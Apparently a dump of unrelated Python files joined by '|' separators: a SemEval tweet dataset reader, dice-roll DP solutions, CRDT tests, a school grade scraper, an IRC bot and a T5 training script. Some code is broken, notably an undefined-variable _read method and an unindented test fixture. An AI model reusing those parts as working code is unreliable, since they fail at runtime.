        NOTE(review): `Field` and `ConfigurationError` are referenced but not
        imported in this file, and slicing a TextField with [:max_tokens] is
        not list slicing — confirm against the allennlp version in use.
        '''
        # text_tokens = self.tokenizer.tokenize(text)
        sequence = TextField(tokens, self.token_indexers)
        if self.max_tokens:
            sequence = sequence[:self.max_tokens]
            lang = lang[:self.max_tokens]
        instance_fields: Dict[str, Field] = {"tokens": sequence}
        if lang is None:
            raise ConfigurationError(
                "Dataset reader was specified to use language tags as "
                "features. Pass them to text_to_instance."
            )
        instance_fields["lang"] = SequenceLabelField(lang, sequence)
        if tid is not None:
            instance_fields['tid'] = LabelField(tid)
        if sentiment is not None:
            instance_fields['labels'] = LabelField(sentiment)
        return Instance(instance_fields)
    @overrides
    def _read(self, file_path: str) -> Iterable[Instance]:
        '''
        NOTE(review): broken — `tokens`, `lang`, `tid`, `sentiment` are never
        defined, so the first yield raises NameError.  The parsing loop that
        should produce them is missing (compare SemevalReader2._read).
        '''
        # if `file_path` is a URL, redirect to the cache
        file_path = cached_path(file_path)
        with open(file_path, "r") as data_file:
            logger.info("Reading instances from lines in file at: %s", file_path)
            yield self.text_to_instance(tokens, lang[1:], tid, sentiment)
    # def _read(self, file_path: str) -> Iterable[Instance]:
    #     '''
    #     Earlier attempt, kept for reference: the plan was to preprocess with
    #     the csnli library and read a tab-separated (id, sentiment, text) file.
    #     '''
    #     with open(file_path, 'r') as lines:
    #         for line in lines:
    #             label_id, sentiment, text = line.strip().split('\t')
    #             yield self.text_to_instance(label_id, sentiment, text)
@DatasetReader.register('semeval-reader-2')
class SemevalReader2(DatasetReader):
    """Reads SemEval code-switched tweets in CoNLL-like (token, lang-tag) format.

    Re-joins usernames the dataset split across tokens, splits punctuation off
    words, and emits Instances with token, language-mask, and sentiment fields.
    """
    def __init__(self,
                 tokenizer: Tokenizer = None,
                 token_indexers: Dict[str, TokenIndexer] = None,
                 max_tokens: int = None,
                 **kwargs):
        super().__init__(**kwargs)
        # Defaults: whitespace tokenization and single-id token indexing.
        self.tokenizer = tokenizer or WhitespaceTokenizer()
        self.token_indexers = token_indexers or {'tokens': SingleIdTokenIndexer()}
        self.max_tokens = max_tokens
    def regex_processor(self, word: str):
        # Split a word on punctuation (comma, period, quotes, bang); the
        # punctuation itself is discarded by re.split.
        reg = r'[,\.\'\"\!]'
        answer = re.split(reg, word)
        return answer
    def strempty(self, word: str):
        # True for the empty string (a by-product of regex_processor).
        if word == '':
            return True
        return False
    def text_to_instance(self,
                        tokens: List[Token],
                        lang: List[str] = None,
                        tid: int = None,
                        sentiment: int = None) -> Instance:
        '''
        input:
            tokens: a List of tokens of our input tweet
            lang: a list of language markers for each token of our input tweet
        output:
            an instance of the same
        taking inspiration from the allennlp conll2003 dataset reader
        NOTE(review): `Field` / `ConfigurationError` are not imported in this
        file, and `sequence[:self.max_tokens]` slices a TextField, which is not
        plain list slicing — confirm against the allennlp version in use.
        '''
        # text_tokens = self.tokenizer.tokenize(text)
        sequence = TextField(tokens, self.token_indexers)
        if self.max_tokens:
            sequence = sequence[:self.max_tokens]
            lang = lang[:self.max_tokens]
        instance_fields: Dict[str, Field] = {"tokens": sequence}
        if lang is None:
            raise ConfigurationError(
                "Dataset reader was specified to use language tags as "
                "features. Pass them to text_to_instance."
            )
        for idx, element in enumerate(lang):
            # these labels correspond to the mask we use for the highlish embedder
            # NOTE we haven't processed user tags, hastags, and urls separately
            # but put them in eng for now
            if element == '1':
                lang[idx] = False
            else:
                lang[idx] = True
        instance_fields["lang"] = SequenceLabelField(lang, sequence)
        # if tid is not None:
        #     instance_fields['tid'] = LabelField(tid)
        if sentiment is not None:
            instance_fields['label'] = LabelField(sentiment)
        return Instance(instance_fields)
    @overrides
    def _read(self, file_path: str) -> Iterable[Instance]:
        """Yield one Instance per sentence chunk of the CoNLL-style file."""
        # if `file_path` is a URL, redirect to the cache
        file_path = cached_path(file_path)
        with open(file_path, "r") as data_file:
            logger.info("Reading instances from lines in file at: %s", file_path)
            # Group into alternative divider / sentence chunks.
            for is_divider, lines in itertools.groupby(data_file, _is_divider):
                # Ignore the divider chunks, so that `lines` corresponds to the words
                # of a single sentence.
                if not is_divider:
                    fields = [line.strip().split() for line in lines]
                    # print(fields)
                    # at this point we need to do stuff to process user tags
                    # especially since the guys at semeval decided to not even process tweets
                    # properly
                    # user tag processing section: re-join usernames that the
                    # dataset split on underscores, marking consumed rows as bad.
                    current_uid = None
                    current_user:str = None
                    bad_indexes = []
                    for idx, field in enumerate(fields):
                        # print(current_user)
                        if len(field) != 2:
                            # Malformed row: drop it and abandon any username
                            # being reassembled.
                            bad_indexes.append(idx)
                            current_uid = None
                            current_user = None
                            # print(0)
                            continue
                        if field[1] == "User":
                            # Start reassembling a (possibly split) username.
                            current_uid = idx
                            current_user = field[0]
                            # print(1)
                            continue
                        if current_user is not None:
                            # print(str("current_user: ") + current_user)
                            if field[0] == '_':  # usernames having underscores have been separated sadly
                                current_user = current_user + "_"
                                bad_indexes.append(idx)  # removed the underscore
                                # print(1.5)
                                # print(current_user[-1])
                                continue
                            elif current_user[-1] == "_":
                                # print("YOLO")
                                current_user = current_user + field[0]
                                # print(current_user)
                                bad_indexes.append(idx)  # removed the current word
                                if len(fields) > idx + 1:
                                    if fields[idx + 1][0] == '_':
                                        # basically our username has more underscores
                                        # print(2)
                                        continue
                                    else:
                                        # Username complete: write it back in place.
                                        fields[current_uid] = [current_user, "User"]
                                        current_uid = None
                                        current_user = None
                                        # print(3)
                                        continue
                                else:
                                    fields[current_uid] = [current_user, "User"]
                                    current_uid = None
                                    current_user = None
                                    # print(4)
                            else:
                                # Next token is an ordinary word: stop tracking.
                                # print(current_user[-1])
                                current_uid = None
                                current_user = None
                    # Pop from the back so earlier indexes stay valid.
                    bad_indexes = [ele for ele in reversed(bad_indexes)]
                    for idx in bad_indexes:
                        fields.pop(idx)
                    # section for user tags over
                    # processing extra ... commas, quotation marks, exclamations etc
                    # test_list = [[40, 1], ['hum', 0], ['dono...jaisa', 1], ['hai,', 1], ['...kaun', 0], ['yahan', 0], ['.', 2]]
                    # # print(fields)
                    # temp_list = test_list[1:]
                    # print(temp_list)
                    # replacement_list = []
                    # for idx, wordpair in enumerate(temp_list):
                    #     word, lang = wordpair
                    #     processed_words = self.regex_processor(word)
                    #     processed_words = [[x, lang] for x in processed_words if not self.strempty(x)]
                    #     replacement_list.append((idx, processed_words))
                    # replacement_list = [ele for ele in reversed(replacement_list)]
                    # for idx, words in replacement_list:
                    #     test_list = test_list[:idx] + words + test_list[idx+1:]
                    # print(test_list)
                    # First row carries (tweet id, sentiment); keep it aside
                    # while punctuation-splitting the word rows.
                    mark = fields[0]
                    fields = fields[1:]
                    replacement_list = []
                    for idx, wordpair in enumerate(fields):
                        word, lang = wordpair
                        processed_words = self.regex_processor(word)
                        processed_words = [[x, lang] for x in processed_words if not self.strempty(x)]
                        replacement_list.append((idx, processed_words))
                    # Replace from the back so earlier indexes stay valid.
                    replacement_list = [ele for ele in reversed(replacement_list)]
                    for idx, words in replacement_list:
                        fields = fields[:idx] + words + fields[idx+1:]
                    fields.insert(0, mark)
                    # print(fields)
                    # unzipping trick returns tuples, but our Fields need lists
                    fields = [list(field) for field in zip(*fields)]
                    # print(fields)
                    try:
                        tokens_, lang = fields
                    except:
                        # NOTE(review): bare except; after printing, the stale
                        # tokens_/lang from the previous chunk are reused below
                        # (or NameError on the first chunk) — confirm intent.
                        print(str(fields))
                    tid = tokens_[0]
                    sentiment = lang[0]
                    # TextField requires `Token` objects
                    tokens = [Token(token) for token in tokens_[1:]]
                    yield self.text_to_instance(tokens, lang[1:], tid, sentiment)
|
"""
1223. Dice Roll Simulation
A die simulator generates a random number from 1 to 6 for each roll.
You introduced a constraint to the generator such that it cannot roll the number i more than rollMax[i] (1-indexed) consecutive times.
Given an array of integers rollMax and an integer n, return the number of distinct sequences that can be obtained with exactly n rolls.
Two sequences are considered different if at least one element differs from each other.
Since the answer may be too large, return it modulo 10^9 + 7.
Example 1:
Input: n = 2, rollMax = [1,1,2,2,2,3]
Output: 34
Explanation: There will be 2 rolls of die, if there are no constraints on the die, there are 6 * 6 = 36 possible combinations.
In this case, looking at rollMax array, the numbers 1 and 2 appear at most once consecutively,
therefore sequences (1,1) and (2,2) cannot occur, so the final answer is 36-2 = 34.
Example 2:
Input: n = 2, rollMax = [1,1,1,1,1,1]
Output: 30
Example 3:
Input: n = 3, rollMax = [1,1,1,2,2,3]
Output: 181
Constraints:
1 <= n <= 5000
rollMax.length == 6
1 <= rollMax[i] <= 15
"""
"""
solution 1: backtrack - O(6^N) in worst case
"""
class Solution:
    def dieSimulator(self, n: int, rollMax: List[int]) -> int:
        """Count distinct sequences of n die rolls obeying rollMax, mod 1e9+7.

        Plain backtracking over every sequence — O(6^n) worst case, so only
        suitable for small n.
        """
        def backtrack(curr_roll, curr_comb):
            if curr_roll == n:
                self.res += 1
                return
            for num in [1, 2, 3, 4, 5, 6]:
                # If the last rollMax[num-1] rolls were all `num`, appending
                # another one would exceed the consecutive-roll limit.
                if len(curr_comb) >= rollMax[num-1] and \
                        all(cons_num == num for cons_num in curr_comb[-rollMax[num-1]:]):
                    continue
                curr_comb.append(num)
                backtrack(curr_roll + 1, curr_comb)
                curr_comb.pop()

        self.res = 0
        backtrack(0, [])
        # The problem asks for the count modulo 10**9 + 7; the original
        # returned the raw count.
        return self.res % (10**9 + 7)
"""
solution 1: Backtrack - O(6^N) in worst case.
backtrack结束条件: curr_cnt == n
constraints on next_candidate: next_candidate could be from 1~6, but cannot be consecutive with prev for too long
arguments pass into backtrack function: curr_cnt, curr_num, repeat_time_of_curr_num
"""
def dieSimulator(self, n: int, roll_max: List[int]) -> int:
    """Backtrack over (rolls so far, last number, length of its current run)."""
    def backtrack(curr_cnt, curr_num, repeat_time):
        if curr_cnt == n:
            self.res += 1
            return
        for next_num in (1, 2, 3, 4, 5, 6):
            if next_num != curr_num:
                # A different number always starts a fresh run of length 1.
                backtrack(curr_cnt + 1, next_num, 1)
            elif repeat_time < roll_max[curr_num - 1]:
                # Extending the current run is allowed only below its limit.
                backtrack(curr_cnt + 1, next_num, repeat_time + 1)

    self.res = 0
    backtrack(0, -1, 0)
    return self.res % (10**9 + 7)
"""
solution 2: backtrack + memo - O(6n^2).
套backtrack + memo的模板即可
"""
class Solution:
    def dieSimulator(self, n: int, roll_max: List[int]) -> int:
        """Backtracking + memoization on (count, last number, run length).

        Polynomial time thanks to the memo; result is taken mod 10**9 + 7.
        """
        def backtrack(curr_cnt, curr_num, repeat_time):
            if curr_cnt == n:
                return 1
            if (curr_cnt, curr_num, repeat_time) in memo:
                return memo[(curr_cnt, curr_num, repeat_time)]
            res = 0
            for next_num in [1, 2, 3, 4, 5, 6]:
                if next_num == curr_num:
                    if repeat_time == roll_max[curr_num-1]:
                        # The run of curr_num already reached its limit —
                        # another one is not allowed.
                        continue
                    res += backtrack(curr_cnt + 1, next_num, repeat_time + 1)
                else:
                    res += backtrack(curr_cnt + 1, next_num, 1)
            memo[(curr_cnt, curr_num, repeat_time)] = res
            return res

        # memo[(curr_cnt, curr_num, repeat_time)] --> number of ways to reach
        # curr_cnt == n from that state.  A plain dict suffices here (and
        # `defaultdict` was never imported in this file, so the original
        # raised NameError at runtime).
        memo = {}
        return backtrack(0, -1, 0) % (10**9 + 7)
|
from app import create_app
# One-off maintenance entry point: build the app (so the package and its
# models are fully initialised) and seed the rank table.
# NOTE(review): the app is created but never run — presumably intentional for
# this populate-only script; confirm.
if __name__ == '__main__':
    app = create_app()
    # Imported late: app.views needs create_app() to have run first.
    from app.views import _populate_ranks
    _populate_ranks()
|
from bs4 import BeautifulSoup
import methods
import requests
import urllib
import parse
import json
import time
import re
import urllib.request
def uri_exists_get(uri: str) -> bool:
    """Return True when a GET on ``uri`` succeeds with a non-error status.

    Any request failure — bad HTTP status, connection error, timeout, invalid
    URL — yields False instead of raising.
    """
    try:
        # A timeout keeps a dead host from hanging the login check forever.
        response = requests.get(uri, timeout=10)
        response.raise_for_status()
    except requests.exceptions.RequestException:
        # RequestException is the base of HTTPError and ConnectionError (the
        # only two the original caught) plus Timeout and friends.
        return False
    return True
main_grade = {}
def main(username, password, link):
    """Log in to Home Access Center at ``link`` and return the parsed grades.

    Returns "link_error" when the login URL is unreachable and "error" when
    the credentials are rejected (the login form is served back).
    """
    # NOTE(review): the ReturnUrl query string repeats the HomeAccess path —
    # it looks accidental, but is kept byte-for-byte since the server may
    # expect it.  (The original f-string had no placeholders.)
    test = "https://" + link + "/HomeAccess/Account/LogOn?ReturnUrl=%2fHomeAccess%2fHomeAccess/Account/LogOn?ReturnUrl=%2fHomeAccess%2f"
    if not uri_exists_get(test):
        return "link_error"
    soup = methods.main(username, password, link)
    # The password field only appears when the login page was served again,
    # i.e. authentication failed.
    if re.search("LogOnDetails.Password", str(soup)):
        return "error"
    classes = soup.findAll("div", {"class": "AssignmentClass"})
    return parse.main(classes)
|
import pytest
from delta_crdt.rga import RGA
from .helpers import transmit
# --- Single-replica behaviour of the RGA (replicated growable array) ---
@pytest.fixture
def rga():
    # Fresh RGA per test; the string argument is the replica id.
    return RGA("test id")
def test_rga_can_be_created(rga):
    # The fixture itself is the assertion: construction must not raise.
    pass
def test_rga_starts_empty(rga):
    assert len(rga) == 0
def test_add_right(rga):
    # add_right(None, x) inserts at the head.
    rga.add_right(None, "a")
    assert rga == ["a"]
def test_append(rga):
    rga.append("a")
    assert rga[0] == "a"
def test_append_twice(rga):
    rga.append("a")
    assert rga[0] == "a"
    rga.append("b")
    assert rga[1] == "b"
def test_length(rga):
    rga.append("a")
    assert len(rga) == 1
def test_contains(rga):
    rga.append("a")
    assert "a" in rga
def test_contains_after_deleted_sequence(rga):
    # Removal must hide the element from membership tests (tombstones are
    # an internal detail).
    rga.append("a")
    rga.append("b")
    rga.remove("a")
    assert "a" not in rga
    assert "b" in rga
def test_insert_after_deleted_sequence(rga):
    # Indexes for del/insert are logical positions over the *visible*
    # elements, not over internal tombstoned nodes.
    rga.append("a")
    rga.append("b")
    rga.append("c")
    assert rga == ["a", "b", "c"]
    rga.append("d")
    assert rga == ["a", "b", "c", "d"]
    del rga[1]
    assert rga == ["a", "c", "d"]
    del rga[1]
    assert rga == ["a", "d"]
    rga.insert(2, "e")
    assert rga == ["a", "d", "e"]
def test_insert_after_updated_sequence(rga):
    rga.append("a")
    rga.append("b")
    rga.append("c")
    assert rga == ["a", "b", "c"]
    rga.append("d")
    assert rga == ["a", "b", "c", "d"]
    # In-place update via __setitem__ must not disturb positions.
    rga[1] = "g"
    assert rga == ["a", "g", "c", "d"]
    rga.insert(2, "e")
    assert rga == ["a", "g", "e", "c", "d"]
def test_extend(rga):
    rga.extend(["a", "b"])
    assert rga == ["a", "b"]
# --- Two replicas exchanging deltas; `transmit` simulates serialization ---
@pytest.fixture
def replicas():
    # Two independent replicas; each mutator returns a delta to be shipped.
    replica1 = RGA("test id 1")
    replica2 = RGA("test id 2")
    deltas1 = []
    deltas1.append(replica1.append("a"))
    deltas1.append(replica1.append("b"))
    deltas2 = []
    deltas2.append(replica2.append("c"))
    deltas2.append(replica2.append("d"))
    return replica1, replica2, deltas1, deltas2
def test_replica_can_handle_diffs_from_another(replicas):
    replica1, replica2, deltas1, deltas2 = replicas
    replica1.apply(transmit(deltas2[0]))
    assert replica1 == ["c", "a", "b"]
    replica1.apply(transmit(deltas2[1]))
    assert replica1 == ["c", "d", "a", "b"]
def test_replica_can_handle_repeated_diffs(replicas):
    # Applying a delta twice must be idempotent.
    replica1, replica2, deltas1, deltas2 = replicas
    replica1.apply(transmit(deltas2[0]))
    assert replica1 == ["c", "a", "b"]
    replica1.apply(transmit(deltas2[1]))
    assert replica1 == ["c", "d", "a", "b"]
    replica1.apply(transmit(deltas2[0]))
    assert replica1 == ["c", "d", "a", "b"]
    replica1.apply(transmit(deltas2[1]))
    assert replica1 == ["c", "d", "a", "b"]
def test_can_reapply_own_diffs(rga):
    # A replica re-applying its own delta must be a no-op.
    delta = rga.extend(["a", "b"])
    assert rga == ["a", "b"]
    rga.apply(delta)
    assert rga == ["a", "b"]
def test_both_replicas_converge(replicas):
    # After a full exchange both replicas hold the same sequence.
    replica1, replica2, deltas1, deltas2 = replicas
    replica1.apply(transmit(deltas2[0]))
    replica1.apply(transmit(deltas2[1]))
    replica2.apply(transmit(deltas1[0]))
    replica2.apply(transmit(deltas1[1]))
    assert replica1 == replica2
    assert replica2 == ["c", "d", "a", "b"]
# --- Concurrent deletions on converged replicas ---
@pytest.fixture
def deletion(replicas):
    # Converge both replicas to ["c","d","a","b"], then delete concurrently:
    # replica1 removes index 1 ("d"), replica2 removes index 2 ("a").
    replica1, replica2, deltas1, deltas2 = replicas
    replica1.apply(transmit(deltas2[0]))
    replica1.apply(transmit(deltas2[1]))
    replica2.apply(transmit(deltas1[0]))
    replica2.apply(transmit(deltas1[1]))
    deltas1 = [replica1.remove_at(1)]
    deltas2 = [replica2.remove_at(2)]
    return replica1, replica2, deltas1, deltas2
def test_can_delete_concurrently(deletion):
    replica1, replica2, deltas1, deltas2 = deletion
    assert replica1 == ["c", "a", "b"]
    assert replica2 == ["c", "d", "b"]
def test_deletion_converges(deletion):
    # Exchanging the deletion deltas removes both elements everywhere.
    replica1, replica2, deltas1, deltas2 = deletion
    replica1.apply(transmit(deltas2[0]))
    replica2.apply(transmit(deltas1[0]))
    assert replica1 == ["c", "b"]
    assert replica2 == ["c", "b"]
@pytest.fixture
def further(deletion):
replica1, replica2, deltas1, deltas2 = deletion
replica1.apply(transmit(deltas2[0]))
replica2.apply(transmit(deltas1[0]))
deltas1 = []
deltas2 = []
deltas1.append(replica1.append("e"))
deltas1.append(replica1.append("f"))
deltas2.append(replica2.append("g"))
deltas2.append(replica2.append("h"))
replica1.apply(transmit(deltas2[0]))
replica1.apply(transmit(deltas2[1]))
replica2.apply(transmit(deltas1[0]))
replica2.apply(transmit(deltas1[1]))
return replica1, replica2, deltas1, deltas2
def test_can_add_further_after_deletion(further):
    # Appends made after deletions still converge to one shared order.
    replica1, replica2, deltas1, deltas2 = further
    assert replica1 == replica2
    assert replica2 == ["c", "b", "g", "h", "e", "f"]
def test_can_join_two_deltas(further):
    # Two buffered deltas can be join()-ed and shipped as a single delta.
    replica1, replica2, deltas1, deltas2 = further
    deltaBuffer1 = [replica1.append("k"), replica1.append("l")]
    deltaBuffer2 = [replica2.append("m"), replica2.append("n")]
    delta1 = replica1.join(deltaBuffer1[0], deltaBuffer1[1])
    delta2 = replica2.join(deltaBuffer2[0], deltaBuffer2[1])
    replica1.apply(transmit(delta2))
    replica2.apply(transmit(delta1))
    assert replica1 == ["c", "b", "g", "h", "e", "f", "m", "n", "k", "l"]
    assert replica1 == replica2
def test_can_reapply_entire_state(further):
    # Re-applying a replica's own full state is a no-op.
    replica1, replica2, deltas1, deltas2 = further
    replica1.apply(transmit(replica1.state))
    replica2.apply(transmit(replica2.state))
    assert replica1 == replica2
    assert replica2 == ["c", "b", "g", "h", "e", "f"]
def test_can_insert_multiple(further):
    # insert() accepts several values and places them consecutively.
    replica1, replica2, deltas1, deltas2 = further
    replica1.insert(1, "X", "Y", "Z")
    assert replica1 == ["c", "X", "Y", "Z", "b", "g", "h", "e", "f"]
def test_ids_give_consistent_order():
    # Concurrent appends are ordered by replica id, independent of which
    # side receives the remote delta.
    replica1 = RGA("a")
    replica2 = RGA("b")
    delta_a = replica1.append("a")
    replica2.append("b")
    replica2.apply(delta_a)
    assert replica2 == ["b", "a"]
    # Same scenario with reversed id ordering ("d" > "c").
    replica3 = RGA("d")
    replica4 = RGA("c")
    replica3.append("d")
    delta_d = replica4.append("c")  # NOTE(review): holds the "c" delta despite its name
    replica3.apply(delta_d)
    assert replica3 == ["d", "c"]
@pytest.fixture
def missing_state():
    """Two independent full states plus two deltas created on top of both,
    used to exercise out-of-order delivery."""
    replica1 = RGA("id1")
    replica1.append("a")
    replica1.append("b")
    replica1.append("c")
    state1 = replica1.state
    replica2 = RGA("id2")
    replica2.append("d")
    replica2.append("e")
    replica2.append("f")
    state2 = replica2.state
    # replica3 merges both states, then produces deltas depending on them.
    replica3 = RGA("id3")
    replica3.apply(state1)
    replica3.apply(state2)
    delta3 = replica3.insert(3, "X")
    delta4 = replica3.append("Y")
    return state1, state2, delta3, delta4
def test_states_and_deltas_applied_in_order(missing_state):
    # Causal delivery order: states first, then the dependent deltas.
    state1, state2, delta3, delta4 = missing_state
    replica = RGA("id")
    replica.apply(state1)
    replica.apply(state2)
    replica.apply(delta3)
    replica.apply(delta4)
    assert replica == ["d", "e", "f", "X", "a", "b", "c", "Y"]
def test_states_and_deltas_applied_in_modified_order(missing_state):
    # Swapping the order of the states and of the deltas must not change
    # the converged result.
    state1, state2, delta3, delta4 = missing_state
    replica = RGA("id")
    replica.apply(state2)
    replica.apply(state1)
    replica.apply(delta4)
    replica.apply(delta3)
    assert replica == ["d", "e", "f", "X", "a", "b", "c", "Y"]
def test_states_and_deltas_applied_deltas_early(missing_state):
    # A delta arriving before one of the states it depends on must still
    # converge once everything has been delivered.
    state1, state2, delta3, delta4 = missing_state
    replica = RGA("id")
    replica.apply(state2)
    replica.apply(delta3)
    replica.apply(state1)
    replica.apply(delta4)
    assert replica == ["d", "e", "f", "X", "a", "b", "c", "Y"]
|
import codecs
import os
from os import listdir
from jinja2 import Environment, FileSystemLoader
from src.jsonclass import JsonClass
from src.layers.javalayer import JavaClassLayer
from src.layers.markdownlayer import MarkdownClassLayer
from src.layers.phplayer import PhpClassLayer
from src.layers.swiftlayer import SwiftClassLayer
import json
# Jinja2 templates; loaded in the __main__ block before generation starts.
java_template = None
java_package = "com.example.test"  # package name injected into Java sources
php_template = None
markdown_template = None
swift_template = None
env = None  # shared jinja2 Environment, also set up in __main__
java_classes ={}  # class name -> JavaClassLayer, consumed by generate_graph()
def _apply_function_to_each(dir, function, **kwargs):
"""
Apply fuction to each file in source_dir
"""
for f in listdir(dir):
file_path = os.path.join(os.path.abspath(dir), f)
function(file_path, **kwargs)
def _generate(file_path):
    """Parse one JSON schema file and emit Java/PHP/Markdown/Swift sources
    plus a flattened copy of the JSON under generated/."""
    print("Processing %s" % file_path)
    json_class = JsonClass(file_path)
    java_class = JavaClassLayer(json_class, java_package, 'jsons')
    # Remember the class for the dependency graph rendered later.
    java_classes[java_class.name()] = java_class
    php_class = PhpClassLayer(json_class)
    swift_class = SwiftClassLayer(json_class)
    markdown_class = MarkdownClassLayer(json_class, php_template.render(class_=php_class),
                                        java_template.render(class_=java_class), 'jsons')
    _render_and_write(class_=java_class, template=java_template, target_dir='generated/java', extension='java')
    _render_and_write(class_=php_class, template=php_template, target_dir='generated/php', extension='php')
    _render_and_write(class_=markdown_class, template=markdown_template, target_dir='generated/docs', extension='md')
    _render_and_write(class_=swift_class, template=swift_template, target_dir='generated/swift', extension='swift')
    # BUG FIX: '{0}.{1}'.format(name, '.json') produced 'name..json'.
    target_flat_file = os.path.join('generated/flat_jsons', '{0}.{1}'.format(json_class.json_name, 'json'))
    # Writing flattened data to the target file.
    with codecs.open(target_flat_file, 'w', 'utf-8') as f:
        # sort_keys expects a bool; the old string "True" only worked by being truthy.
        json.dump(obj=json_class.get_flat_json_data(), ensure_ascii=False, fp=f, sort_keys=True, indent=4)
def _render_and_write(class_, template, target_dir, extension):
string_out = template.render(class_=class_)
target_path = os.path.join(target_dir, '{0}.{1}'.format(class_.name(), extension))
with codecs.open(target_path, 'w', 'utf-8') as f:
f.write(string_out)
def generate_yaml(dir, target_path):
    """
    Generate the mkdocs YAML config listing every generated docs page.

    :param dir: directory containing the generated .md files
    :param target_path: path the rendered YAML is written to
    """
    res = []
    for f in listdir(dir):
        # Page names are the markdown filenames without the .md suffix.
        res.append(f.replace('.md', ''))
    ytemplate = env.get_template('mkdoc_yaml_template.yaml')
    string_out = ytemplate.render(files=res)
    with codecs.open(target_path, 'w', 'utf-8') as f:
        f.write(string_out)
def generate_graph(target_path):
    """
    Generate a Graphviz .dot class diagram from the collected Java classes.
    (Docstring corrected: this renders the graph template, not the mkdocs YAML.)
    """
    ytemplate = env.get_template('graph_template.dot')
    string_out = ytemplate.render(classes=java_classes)
    with codecs.open(target_path, 'w', 'utf-8') as f:
        f.write(string_out)
if __name__ == '__main__':
    # Load all templates once, then generate sources for every schema in jsons/.
    env = Environment(loader=FileSystemLoader("../src/templates"), trim_blocks=True)
    markdown_template = env.get_template('markdown_template.md')
    java_template = env.get_template('java_template.java')
    php_template = env.get_template('php_template.php')
    swift_template = env.get_template('swift_template.swift')
    _apply_function_to_each('jsons', _generate)
    # generate_yaml('generated/docs', 'generated/mkdocs.yml')
    generate_graph('generated/class_diagram.dot')
|
import re

# Find simple user@domain.tld addresses: letters/digits/./-/_ in the local
# part, alphanumeric domain, alphabetic TLD.
text = "sangeeth1-23sj@gmail.com random alan@gmail.net string"
# Raw string; '.', '-', '_' need no escaping inside a character class.
pattern = re.compile(r"[a-zA-Z0-9._-]+@[a-zA-Z0-9]+\.[a-zA-Z]+")
# BUG FIX: the original computed pattern.search(text) and immediately
# overwrote it with findall(); the dead statement is removed.
result = pattern.findall(text)
print(result)
|
import re
from random_line import random_line_from_file
from oyoyo import helpers
history = {}
MAXHISTORY = 10
def get_nick(fullnick):
    """Return the nick part of an IRC 'nick!user@host' prefix."""
    return fullnick.partition("!")[0]
def echo(client, nick, message):
    """Reply "pong" via private message when someone says "ping"."""
    if "ping" == message.lower():
        helpers.msg(client, nick, "pong")
def whoami(client, nick, message):
    """Tell the sender their own nick when asked "whoami"."""
    if "whoami" == message.lower():
        helpers.msg(client, nick, "you are %s, I think." % nick)
def uppercase(client, nick, chan, cmd, args):
    """Command handler: "upper <text>" echoes <text> upper-cased to the channel."""
    if len(args) > 0 and cmd.lower() == "upper":
        helpers.msg(client, chan, args.upper())
def regex(client, nick, chan, message):
    """Handle s/pattern/replacement/[i] substitution requests against the
    channel history; any other message is pushed onto the history buffer."""
    matches = re.match(r"^s/(.*)/(.*)/(i?)$", message)
    if matches:
        # Walk the history newest-first and rewrite the first line the
        # pattern matches. .get() avoids a KeyError on a channel with no
        # history yet (the original indexed history[chan] directly).
        for histnick, item in reversed(history.get(chan, [])):
            flags = 0
            for flag in matches.group(3):
                if flag.lower() == "i":
                    flags = flags | re.I
            # BUG FIX: the original passed `flags` positionally, where
            # re.subn expects `count` -- the flags were silently treated as
            # a substitution limit. Pass the keyword argument instead.
            (replaced, subs) = re.subn(matches.group(1), matches.group(2), item, flags=flags)
            if subs > 0:
                helpers.msg(client, chan, "<%s> %s" % (get_nick(histnick), replaced))
                break
    else:
        print("not a regex, pushing to history")
        if chan not in history:
            history[chan] = []
        history[chan].append((nick, message))
        if len(history[chan]) > MAXHISTORY:
            history[chan].pop(0)
def hackers_cmd(client, nick, chan, cmd, args):
    """Command handler: "hackers" posts a random line from hackers.txt."""
    if cmd.lower() != "hackers":
        return
    helpers.msg(client, chan, random_line_from_file("hackers.txt"))
def hackers_pub(client, nick, chan, message):
    """Passive handler: any mention of "hackers" triggers a random quote."""
    if "hackers" not in message.lower():
        return
    helpers.msg(client, chan, random_line_from_file("hackers.txt"))
|
import psycopg2
db_pools = {}
def get_conn(dbname):
    """Check a connection for *dbname* out of the pool, creating a fresh
    one when no idle connection is available."""
    pool = db_pools.setdefault(dbname, set())
    if pool:
        return pool.pop()
    return psycopg2.connect(database=dbname)
def put_conn(dbname, conn):
    """Return *conn* to the idle pool for *dbname*."""
    db_pools.setdefault(dbname, set()).add(conn)
class db_conn(object):
    """Context manager over a pooled psycopg2 connection.

    On entry it checks a connection out of the module pool and opens a
    cursor; on exit it commits when the block succeeded, rolls the
    connection back to a clean state, and returns it to the pool.
    """

    def __init__(self, dbname):
        self.dbname = dbname

    def execute(self, query, params=()):
        """Run *query* without fetching results."""
        self.cur.execute(query, params)

    def execute_fetch(self, query, params=()):
        """Run *query* and return all result rows."""
        self.cur.execute(query, params)
        return self.cur.fetchall()

    def execute_fetchone(self, query, params=()):
        """Run *query* and return the first result row (or None)."""
        self.cur.execute(query, params)
        return self.cur.fetchone()

    def __enter__(self):
        self.conn = get_conn(self.dbname)
        self.cur = self.conn.cursor()
        return self

    def __exit__(self, exc_type, exc_value, exc_traceback):
        # Renamed from `type`/`value`/`traceback`, which shadowed builtins
        # and a stdlib module name. Commit only on clean exit.
        if exc_type is None:
            self.conn.commit()
        self.cur.close()
        # Roll back any remaining transaction state so the pooled
        # connection is returned clean (a no-op right after commit).
        self.conn.rollback()
        put_conn(self.dbname, self.conn)
|
import os
from transformers import (T5Config, T5ForConditionalGeneration, Trainer,
TrainingArguments, HfArgumentParser)
from data import read_parallel_split
def main(training_args, args):
    """Train a T5 model on a tokenized parallel corpus and save it.

    :param training_args: transformers.TrainingArguments for the Trainer
    :param args: namespace with model_dir, parallel_path and inverse flags
    """
    # Fresh model when the save directory doesn't exist yet; otherwise
    # resume from the previously saved checkpoint.
    if not os.path.isdir(args.model_dir):
        os.makedirs(args.model_dir)
        config = T5Config(vocab_size=32100)
        # Use the pad token as the decoder start token.
        config.decoder_start_token_id = config.pad_token_id
        model = T5ForConditionalGeneration(config)
    else:
        model = T5ForConditionalGeneration.from_pretrained(args.model_dir)
    # inverse=True swaps source/target for backtranslation training.
    train_dataset, val_dataset = read_parallel_split(args.parallel_path,
                                                     inverse=args.inverse)
    trainer = Trainer(
        model=model,
        args=training_args,
        train_dataset=train_dataset,
        eval_dataset=val_dataset
    )
    trainer.train()
    trainer.save_model(args.model_dir)
if __name__ == '__main__':
    # HfArgumentParser fills TrainingArguments from the CLI; the extra
    # script-specific flags are plain argparse arguments and come back as a
    # separate namespace from parse_args_into_dataclasses().
    parser = HfArgumentParser(TrainingArguments)
